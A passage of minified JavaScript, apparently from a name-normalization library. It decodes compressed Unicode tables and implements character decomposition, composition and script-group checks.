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");
                const f = new Map([
                    [
                        8217,
                        "apostrophe"
                    ],
                    [
                        8260,
                        "fraction slash"
                    ],
                    [
                        12539,
                        "middle dot"
                    ]
                ]);
                function p(e) {
                    return `{${function(e) {
                        return e.toString(16).toUpperCase().padStart(2, "0");
                    }(e)}}`;
                }
                function m(e) {
                    let t = [];
                    for(let r = 0, n = e.length; r < n;){
                        let n = e.codePointAt(r);
                        r += n < 65536 ? 1 : 2, t.push(n);
                    }
                    return t;
                }
                function g(e) {
                    let t = e.length;
                    if (t < 4096) return String.fromCodePoint(...e);
                    let r = [];
                    for(let n = 0; n < t;)r.push(String.fromCodePoint(...e.slice(n, n += 4096)));
                    return r.join("");
                }
                function y(e, t) {
                    let r = e.length, n = r - t.length;
                    for(let i = 0; 0 == n && i < r; i++)n = e[i] - t[i];
                    return n;
                }
                var v = r("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");
                function b(e) {
                    return e >> 24 & 255;
                }
                function E(e) {
                    return 16777215 & e;
                }
                const A = new Map(s(v).flatMap((e, t)=>e.map((e)=>[
                            e,
                            t + 1 << 24
                        ]))), _ = new Set(o(v)), w = new Map, T = new Map;
                for (let [e, t] of a(v)){
                    if (!_.has(e) && 2 == t.length) {
                        let [r, n] = t, i = T.get(r);
                        i || (i = new Map, T.set(r, i)), i.set(n, e);
                    }
                    w.set(e, t.reverse());
                }
                const R = 44032, I = 4352, S = 4449, P = 4519;
                function O(e) {
                    return e >= R && e < 55204;
                }
                function x(e, t) {
                    if (e >= I && e < 4371 && t >= S && t < 4470) return R + 588 * (e - I) + 28 * (t - S);
                    if (O(e) && t > P && t < 4547 && (e - R) % 28 == 0) return e + (t - P);
                    {
                        let r = T.get(e);
                        return r && (r = r.get(t), r) ? r : -1;
                    }
                }
                function M(e) {
                    let t = [], r = [], n = !1;
                    function i(e) {
                        let r = A.get(e);
                        r && (n = !0, e |= r), t.push(e);
                    }
                    for (let n of e)for(;;){
                        if (n < 128) t.push(n);
                        else if (O(n)) {
                            let e = n - R, t = e % 588 / 28 | 0, r = e % 28;
                            i(I + (e / 588 | 0)), i(S + t), r > 0 && i(P + r);
                        } else {
                            let e = w.get(n);
                            e ? r.push(...e) : i(n);
                        }
                        if (!r.length) break;
                        n = r.pop();
                    }
                    if (n && t.length > 1) {
                        let e = b(t[0]);
                        for(let r = 1; r < t.length; r++){
                            let n = b(t[r]);
                            if (0 == n || e <= n) {
                                e = n;
                                continue;
                            }
                            let i = r - 1;
                            for(;;){
                                let r = t[i + 1];
                                if (t[i + 1] = t[i], t[i] = r, !i) break;
                                if (e = b(t[--i]), e <= n) break;
                            }
                            e = b(t[r]);
                        }
                    }
                    return t;
                }
                function B(e) {
                    return M(e).map(E);
                }
                function N(e) {
                    return function(e) {
                        let t = [], r = [], n = -1, i = 0;
                        for (let o of e){
                            let e = b(o), s = E(o);
                            if (-1 == n) 0 == e ? n = s : t.push(s);
                            else if (i > 0 && i >= e) 0 == e ? (t.push(n, ...r), r.length = 0, n = s) : r.push(s), i = e;
                            else {
                                let o = x(n, s);
                                o >= 0 ? n = o : 0 == i && 0 == e ? (t.push(n), n = s) : (r.push(s), i = e);
                            }
                        }
                        return n >= 0 && t.push(n, ...r), t;
                    }(M(e));
                }
                const C = 65039, k = ".";
                function L() {
                    return new Set(o(h));
                }
                const F = new Map(a(h)), D = L(), j = L(), U = L(), H = L(), G = s(h);
                function V() {
                    return new Set([
                        o(h).map((e)=>G[e]),
                        o(h)
                    ].flat(2));
                }
                const W = h(), q = u((e)=>{
                    let t = u(h).map((e)=>e + 96);
                    if (t.length) {
                        let r = e >= W;
                        t[0] -= 32, t = g(t), r && (t = `Restricted[${t}]`);
                        let n = V(), i = V(), o = [
                            ...n,
                            ...i
                        ].sort((e, t)=>e - t);
                        return {
                            N: t,
                            P: n,
                            M: h() - 1,
                            R: r,
                            V: new Set(o)
                        };
                    }
                }), z = L(), Q = new Map;
                [
                    ...z,
                    ...L()
                ].sort((e, t)=>e - t).map((e, t, r)=>{
                    let n = h(), i = r[t] = n ? r[t - n] : {
                        V: [],
                        M: new Map
                    };
                    i.V.push(e), z.has(e) || Q.set(e, i);
                });
                for (let { V: e, M: t } of new Set(Q.values())){
                    let r = [];
                    for (let t of e){
                        let e = q.filter((e)=>e.V.has(t)), n = r.find(({ G: t })=>e.some((e)=>t.has(e)));
                        n || (n = {
                            G: new Set,
                            V: []
                        }, r.push(n)), n.V.push(t), e.forEach((e)=>n.G.add(e));
                    }
                    let n = r.flatMap(({ G: e })=>[
                            ...e
                        ]);
                    for (let { G: e, V: i } of r){
                        let r = new Set(n.filter((t)=>!e.has(t)));
                        for (let e of i)t.set(e, r);
                    }
                }
                let K = new Set, J = new Set;
                for (let e of q)for (let t of e.V)(K.has(t) ? J : K).add(t);
                for (let e of K)Q.has(e) || J.has(e) || Q.set(e, 1);
                const X = new Set([
                    ...K,
                    ...B(K)
